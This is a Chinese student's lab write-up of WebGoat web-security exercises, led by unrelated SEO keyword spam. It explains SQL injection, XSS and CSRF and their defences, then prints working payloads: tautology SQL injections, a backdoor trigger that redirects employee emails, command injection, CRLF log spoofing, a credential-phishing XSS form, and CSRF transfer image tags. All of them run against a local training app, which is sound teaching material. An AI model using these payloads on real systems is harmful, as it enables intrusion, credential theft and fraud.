驾校官方网站 模板,怎么做网站旺铺装修,某运动服网站建设规划书,快速推广20145227鄢曼君《网络对抗》Web安全基础实践 实验后回答问题 1.SQL注入攻击原理#xff0c;如何防御#xff1f; SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序#xff0c;而这些输入大都是SQL语法里的一些组合#xff0c;通过执行SQL语句进而执行攻击者所要…20145227鄢曼君《网络对抗》Web安全基础实践 实验后回答问题 1.SQL注入攻击原理如何防御 SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序而这些输入大都是SQL语法里的一些组合通过执行SQL语句进而执行攻击者所要的操作其主要原因是程序没有细致地过滤用户输入的数据致使非法数据侵入系统。根据相关技术原理SQL注入可以分为平台层注入和代码层注入。前者由不安全的数据库配置或数据库平台的漏洞所致后者主要是由于程序员对输入未进行细致地过滤从而执行了非法的数据查询。防御对输入的数据进行过滤过滤掉敏感字符。加密数据库。2.XSS攻击的原理如何防御 XSS是一种经常出现在web应用中的计算机安全漏洞它允许恶意web用户将代码植入到提供给其它用户使用的页面中。攻击者利用网站漏洞输入可以显示在页面上的、对其他用户造成影响的HTML代码由于受害者浏览器对目标服务器的信任当其访问目标服务器上被注入恶意脚本的页面后这段恶意脚本可以顺利执行实现获取用户cookie并可以利用用户身份进行非法操作的目的。防御检查用户输入的内容中是否有非法内容如尖括号、引号等严格控制输出。还有就是在表单提交或者url参数传递前对需要的参数进行过滤。3.CSRF攻击原理如何防御 CSRF全名是Cross-site request forgery是一种对网站的恶意利用。CSRF攻击的主要目的是让用户在不知情的情况下攻击自己已登录的一个系统通过伪装来自受信任用户的请求来利用受信任的网站。它危害性甚至比XSS更大。比如实验中的转账之类的。防御用户在浏览其它站点前登出站点在浏览器会话结束后清理浏览器的cookie尽量不要在页面的链接中暴露用户隐私信息避免全站通用的cookie严格设置cookie的域。实验感想 这次实验确实内容很多但是都还挺有意思的而且我也学到了一些东西。这次的实验感觉与我们生活息息相关其实我们之前学的很多课程都有涉及到web安全这一次的Web安全基础实践又让我了解到了更多的关于这方面的攻击手段等相信以后登录网页或者点击链接之类的我会更加谨慎。实践过程 开启webgoat打开WebGoatjava -jar webgoat-container-7.0.1-war-exec.jar 然后在浏览器输入localhost:8080/WebGoat进入webgoat。SQL练习 String SQL InjectionSQL字符串注入 这个题的题目大意是这个表单允许使用者查询他们的信用卡号使用SQL注入让所有的信用卡号都看得见。 我们构造一个永真式“1”那么不管前面的WHERE是否成立都能执行所以构造语句or 11,成功得到了全部的信用卡号。 Numeric SQL Injection数字型SQL注入 这个题大概意思是这个表单允许使用者看到天气数据利用SQL注入使得可以看见所有数据。由于没办法直接输入无法在前端进行SQL注入我们可以从捕获包中修改。首先启动BurpSuite。然后设置代理“Proxy”的“Options”选项默认是8080端口被占用时需要添加一个新的端口8888点击add添加后勾选。 然后设置浏览器的代理打开浏览器右侧的“更多”选项卡preference-advanced-settings这相当于将burpsuite当成中间服务器每个数据包都流过它。设置好之后回到题目任意选择一项点击GO然后回到burpsuite。发现多了捕获的包。然后右键send to repeater 我们修改station值从为101 为 101 or 11,点击GO可以看到右边response包中的SQL语句为SELECT * FROM weather_data WHERE station 101 or 11。 回到Proxy中点击Intercept is on对剩下的包不作处理回到火狐浏览器发现已经成功了 Command Injection命令注入 题目要求能够在目标主机上执行系统命令我发现可以通过火狐浏览器下的一个扩展Firebug对源代码进行修改例如在BackDoors.help旁边加上 netstat -an ipconfig 选中修改后的值再点view可以看到命令被执行出现系统网络连接情况 Database Backdoors 输入注入语句101; update employee set salary9000成功把该用户的工资涨到了9000。这种给别人涨工资的感觉好棒啊~ 接下来使用语句101;CREATE TRIGGER ymjBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email20145227qq.com WHERE userid NEW.userid 创建一个后门把表中所有的邮箱和用户ID都设为我的。所有人的工资都邮到我这里吧哈哈哈 Blind Numeric SQL Injection 题目要求是得到一个存放在pins表中值pin的内容行号cc_number1111222233334444是一个int型的数据。然后使用BurpSuite进行拦截拦截后action--send to intruder进行暴力破解使用sniper模式选择10000进行数字爆破选择前先clear将默认的爆破点清除,从1到10000步长为1。可以发现2364的报文长度明显和其他不一样那这个值就应该就是2364 Log Spoofing日志欺骗 这道题大概意思是说我们输入的用户名会被追加到日志文件中。所以我们可以使用障眼法来使用户名为“admin”的用户在日志中显示“成功登录”例如在User Name文本框中输入ymj%0d%0aLogin Succeeded for username: admin其中%0d是回车%0a是换行符 攻击成功 LABSQL Injection Stage 1String SQL Injection 题目要求使用字符串SQL注入在没有正确密码的情况下登录账号boss。以用户Neville登录在密码栏中输入 or 11 --进行SQL注入但是登录失败。查看了一下网页源码发现输入框对输入的字符长度进行了限制最多只允许输入8个字符 于是我对字符长度进行了修改然后重新登录登录成功 Stage 3Numeric SQL Injection 题目要求通过注入语句浏览到原本无法浏览的信息。通过一个普通员工的账户larry浏览其BOSS的账户信息。首先我们用上一题的办法登录Larry的账号在密码框里输入 or 11 --登录后发现我们只能看见Larry一个人的工资信息. 浏览员工信息的按钮是ViewProfile.在网页代码中分析一下这个按钮发现这个地方是以员工ID作为索引传递参数的我们要达到通过Larry来浏览老板账户信息的目的把其中的value值改为101 or 11 order by salary desc --这样老板的信息就会被排到第一个 然后成功查看到老板的信息 XSS攻击 Phishing with XSS 这个题目我们要在搜索框中输入XSS攻击代码/formscript
function hack(){
XSSImagenew Image;
XSSImage.srchttp://localhost:8080/WebGoat/catcher?PROPERTYyesuser document.phish.user.value password document.phish.pass.value ;
alert(Had this been a real attack... Your credentials were just stolen. User Name document.phish.user.value Password document.phish.pass.value);
} /script
form namephish
br
br
HRH2This feature requires account login:/H2
brbrEnter Username:brinput typetext nameuserbrEnter Password:brinput typepassword name pass
brinput typesubmit namelogin valuelogin onclickhack()
/form
br
br
HR在搜索框中输入攻击代码后点击搜索会看到一个要求输入用户名密码的表单然后输入用户名密码点击登录WebGoat会将你输入的信息捕获并反馈给你 攻击成功结果如下图 Stored XSS Attacks 题目要求要创建非法的消息内容可以导致其他用户访问时载入非预期的页面或内容。直接在title里随便输入然后在message中输入一串代码比如scriptalert(hhh5227lll!);/script 提交后再次点击刚刚创建的帖子成功弹出窗口说明攻击成功! Reflected XSS Attacks 当我们输入错误的用户信息后服务器校验输入有误会返回错误页面并将错误内容展示给我们看 如果我们将带有攻击性的URL作为输入源比如scriptalert(hhh20145227ymj);/script就会弹出对话框 攻击成功 这个看上去和上面很相似但是原理不同上面的是存储式的这个是通过写在url里面达到的效果里面的脚本也可以改写成其他恶意的内容。CSRF攻击 Cross Site Request Forgery 题目要求需要写一个URL诱使其他用户点击从而触发CSRF攻击我们可以以图片的的形式将URL放进Message框这时的URL对其他用户是不可见的用户一旦点击图片就会触发一个CSRF事件。查看自己电脑的Screen和menu的值 然后在message里面输入img srchttp://localhost:8080/WebGoat/attack?Screen291menu900transferFunds转账金额/就会发出一个转钱的请求盗取钱财。提交后会在消息列表中看到一个新的消息点击该消息当前页面就会下载这个消息并显示出来转走用户的钱达到CSRF攻击的目的。 CSRF Prompt By-Pass 这个就是利用CSRF进行冒名操作转账,不过这次包括了两个请求一是转账请求二是确认转账成功请求即需要额外传递两个参数给服务器transferFunds4000transferFundsCONFIRM。直接在message中写入攻击代码然后提交 点击了CONFIRM按钮,成功实现 转载于:https://www.cnblogs.com/m3182218/p/6842135.html
